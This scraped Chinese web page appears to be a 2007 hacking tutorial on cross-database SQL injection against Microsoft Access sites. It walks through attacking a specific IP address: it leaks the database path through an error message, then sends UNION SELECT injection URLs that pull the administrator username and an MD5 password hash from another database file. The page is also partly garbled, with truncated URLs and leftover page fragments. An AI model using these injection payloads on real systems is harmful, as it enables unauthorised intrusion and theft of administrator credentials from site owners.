This Domain(Admin5.com) is for Sale:

Access的跨库查询

时间:2007-12-23  来源:不详  作者:迈克DB
javascript:if(this.width>screen.width-333)this.width=screen.width-333" border=0>

哈哈! 我们已经得到字段数了,并且我们可以得到在字段1的我位置,可以显示我们查询的数据。现在还就差盗帅的位置了,简单我们暴库,提交:

http://219.237.81.46/dsdown\regs.成功返回路径:

Microsoft JET Database Engine 错误 '80004005'

'D:\111\db\kljdsld.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

/dsdown/db/user.,行6(注重:这样得到的的路径不一定是“完整”的,真正的路径为:D:\111\dsdown\db\kljdsld.asa)下面我们跨库,构造url如下:

http://219.237.81.46/yddown/list.?id=75 union select admin,3,2 from admin in "D:\111\dsdown\db\kljdsld.asa" where id=1上面的语句是,union查询数据D:\111\db\kljdsld.asa里表admin里id=1的字段admin的数据,假如成功将直接暴出后台治理的用户名:

dedecms.com



得到用户名为admin 我们接着暴密码:

http://219.237.81.46/yddown/list.?id=75 union select pws,3,2 from admin in "D:\111\dsdown\db\kljdsld.asa" where id=1如图:



得到密码为32位的md5加密的hash:77e6cbb3f9468eadb655ae6826357922,我们跨库查询成功,这里我只是为大家演示下跨库查询,黑防那里就不管咯 : )。小结本文主要是给大家介绍了2个非常有用的方法,第1 我们在注射时不一顶要一个个字符去猜,那样碰到中文的很麻烦,直接用union替代数据可以直接暴出数据,不关是中文还是非凡字符,都可以一步到位,第2 就是跨库了,使用很灵活,可以让你在渗透时,有意想不到的收获。

  

看完这篇,您有何感觉呢?

文章评论

共有位Admini5网友发表了评论 查看完整内容

24小时热门信息